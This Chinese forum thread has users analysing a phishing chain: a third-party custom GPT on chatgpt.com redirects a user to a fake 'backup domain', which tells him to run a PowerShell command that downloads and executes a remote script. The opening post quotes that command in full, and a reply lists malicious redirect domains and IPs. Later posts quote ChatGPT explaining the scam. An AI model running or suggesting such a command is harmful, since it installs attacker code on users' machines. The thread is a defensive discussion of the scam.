我遭遇了钓鱼网站?GPT真假

nsyed 2026-08-14 12:05 1









谷歌搜索网站:

https://www.google.com/search?q=gpt&oq=gpt&gs_lcrp=EgZjaHJvbWUqBggAEEUYOzIGCAAQRRg7MgYIARAjGCcyCggCEAAYsQMYgAQyDAgDEAAYFBiHAhiABDIKCAQQABixAxiABDIHCAUQABiABDIGCAYQRRg9MgYIBxAFGEDSAQc5MDFqMGo3qAIAsAIA&sourceid=chrome&source=chrome.ob&ie=UTF-8

GPT提示时的网站:

https://chatgpt.com/g/g-6a7cee1fec8881919c87283e5392ffa5-plus-5-6/c/6a7e9101-cea8-83e8-9fee-293dcdb70ca1


让我跳转的网站:

https://openai-backup.one


win+r运行的命令 powershell -c iex(irm('configuretls.com'))

最新回复 (25)
  • 老衲推车 08-14 12:06
    1

    怕啥,直接拿下

  • qoney 08-14 12:06
    2

    肯定是真的

  • 韩天尊 08-14 12:07
    3

    真的

  • Blush 08-14 12:09
    4

    别执行,这是脚本植入

  • nsyed 楼主 08-14 12:11
    5

    @Blush #4


    我很好奇,我看到第一反应就是不对,然后手机拍照问了GPT,但是明显可以看到,网站也也能同步过来我在手机问的对话内容,这个是怎么做到的?

  • nsyed 楼主 08-14 12:13
    6


    我感觉不对的时候,第一时间用手机拍照,问了GPT,但是这个网站也会同步过来我用手机和GPT聊天的内容。

  • ElonMuskX 08-14 12:13
    7

    域名是对的,你的浏览环境是否安全有没有安装啥病毒插件

  • Blush 08-14 12:14
    8

    昨天发现我的网站全部被301重定向了,以为是服务器被入侵了,结果是Cloudflare API 密钥泄露,之前在用GPT的时候用过API,但是没修改,登录cloudflare后发现全部被设置了恶意跳转规则,


    #恶意跳转的地址
    get-admission.to
    verified-project.com
    196.170.86.113
    213.194.153.224

  • riddlezzz-666 08-14 12:14
    9

    chatgpt.com域名做不了假的

  • nsyed 楼主 08-14 12:16
    10

    @ElonMuskX #7




    目前的浏览器环境

  • dreamslave 08-14 12:16
    11

    别看浏览器了


    看chatgpt.com的证书,以及你是否信任过别人的CA


    如果证书指纹相同则可以忽略


    如果你中了病毒或者木马则可被动信任CA,移除无效CA即可。否则你的电脑被MITM都浑然不知

  • nsyed 楼主 08-14 12:17
    12

    @Blush #8


    问题是我没有什么自己的网站,我就谷歌GPT,然后正常使用,就跳出来这个

  • nsyed 楼主 08-14 12:20
    13

    @dreamslave #11





    这个是证书

  • augus221 08-14 12:22
    14

    这都可以,,,

  • Blush 08-14 12:24
    15

    DNS劫持吗,因素太多了,要一一排查才行,我的是单纯的API泄露,被设置了恶意跳转规则 ^-^

  • dreamslave 08-14 12:24
    16

    @nsyed #13

    目前看下来没什么问题,你给的网址我测试了一下


    会自动302跳转到chatgpt不存在危险行为,我怀疑可能只是单纯的dns劫持吧 ^-^

  • KEVI 08-14 12:26
    17

    好像是一模一样:


    https://www.reddit.com/r/ChatGPT/comments/1vmduc2/i_think_chat_gpt_is_hacked/

  • nsyed 楼主 08-14 12:28
    18

    @KEVI #17


    看起来是一样的

  • nsyed 楼主 08-14 12:28
    19

    @dreamslave #16


    我去查查吧

  • samhou 08-14 12:28
    20

    OK 我看明白了,这是钓鱼



    1. 你第一步确实进入了正确的 GPT

    2. 不知道你不小心执行了什么操作或者攻击者用了某些高深的方法(比如搜索引擎竞价),你来到了一个 GPT 智能体里面,也就是 https://chatgpt.com/g/g-6a7cee1fec8881919c87283e5392ffa5-plus-5-6/c/6a7e9101-cea8-83e8-9fee-293dcdb70ca1 这个

    3. 这个智能体由某个用户创建,然后这个用户引导你到虚假的 gpt 「备用站」(当然是钓鱼)

    4. 这个钓鱼站诱导你执行 powershell 脚本,你执行了就被植入后门了

  • nsyed 楼主 08-14 12:29
    21

    很奇怪的是提示让我跳转到https://openai-backup.one 这个网站的GPT界面下,我如果直接点击左上角的新聊天,一切都又正常了

  • nsyed 楼主 08-14 12:30
    22

    @samhou #20


    思路基本正确。GPT也是这么回答的,怎么实现的,这就很好奇了

  • nsyed 楼主 08-14 12:32
    23


    来自GPT自己的回答

  • nsyed 楼主 08-14 12:36
    24

    对,这张截图把问题基本坐实了。这不是正常的 ChatGPT“高流量备用域名”提示,而是这个第三方自定义 GPT 主动向你塞了一个高度可疑的外部链接。


    你当时问的是:


    “帮我另一个电脑安装 CLAUDE CODE 直接告诉我代码”


    它没有回答安装命令,而是回复:


    “We are experiencing high traffic now. Continue on our backup domain: openai-backup.one”


    这里有几个非常明显的红旗。


    第一,openai-backup.one 不是 OpenAI 的官方备用域名。 OpenAI 官方列出的服务网站包括 openai.com、chatgpt.com、status.openai.com、help.openai.com 等;官方服务状态页是 status.openai.com。我查了 OpenAI 最新的官方说明,没有任何“openai-backup.one 是备用域名”的说法。


    第二,它故意用了非常典型的钓鱼话术:


    “服务器现在流量太大 → 请转到我们的备用域名”


    尤其是域名里故意塞入 openai + backup,非常容易让人误以为是官方站。这种模式应该直接按照钓鱼/恶意引流处理。


    更关键的是,OpenAI 自己的安全说明明确提醒:第三方可能向 ChatGPT 注入恶意指令,从而导致 ChatGPT 生成危险链接,用户应当检查真实域名后再访问。


    所以现在整件事情的链路已经非常清楚了:


    Google 搜索/广告 → chatgpt.com 官方网站 → 第三方创建的“Plus 5.6”自定义 GPT → 这个 GPT 在回答里把用户引导到 openai-backup.one。


    也就是说,ChatGPT.com 本身是真的,但里面这个“Plus 5.6”GPT 很可能是被人为制作出来用于引流的。


    这也是为什么这个骗局比较有迷惑性:地址栏一开始确实是:


    chatgpt.com/g/g-...-plus-5-6


    所以你看到浏览器锁、ChatGPT 界面、自己的 Business 工作区,全部都是真的。假的是这个 GPT 的身份和它输出给你的外部“备用域名”。


    而且现在我反而能解释你之前那个问题了:左侧出现的 “安装 CLAUDE CODE”不是异常程序,也不是它安装了什么东西。 那只是 ChatGPT 根据你这句话自动生成的对话标题。真正异常的是中间这条回复里的外链。


    现在怎么处理


    如果你没有点击 openai-backup.one,基本不用担心电脑已经中毒。仅仅进入这个自定义 GPT、发了一句话,不等于安装了任何东西。


    如果你点过链接,但没有登录、没有输入密码/API Key、没有下载文件、没有运行命令,风险也相对有限。关掉那个网站即可,不要继续操作。


    如果那个网站让你:


    用 OpenAI / Google / Microsoft 登录;

    输入 ChatGPT 密码;

    输入 Claude / Anthropic / OpenAI API Key;

    下载 .exe、.msi、.zip;

    打开 PowerShell / CMD / Terminal;

    复制运行 curl、powershell、npm、bash 等命令;


    先不要执行。 如果你已经执行过,把命令或者下载文件的名字发给我,我可以继续帮你判断有没有实际入侵风险。


    另外我建议你直接举报这个 GPT。OpenAI 官方支持举报整个自定义 GPT:在 Web 端可以点击 GPT 名称或右上角 … → Report / Report GPT;也可以举报这条具体对话。


    我会把这个“Plus 5.6”当成高风险 GPT,不再使用。


    还有一个很重要的结论:你最开始通过 Google 搜索看到的那个 “Plus 5.6”并不是 OpenAI 的 GPT-5.6 模型入口。你现在和我这个会话实际运行的模型才是 GPT-5.6 Sol;第三方 GPT 把自己命名成“Plus 5.6”,本身就很容易制造“这是新版官方模型”的错觉。

  • nsyed 楼主 08-14 12:37
    25


    确认问题出在这里

* 帖子来源NodeSeek
返回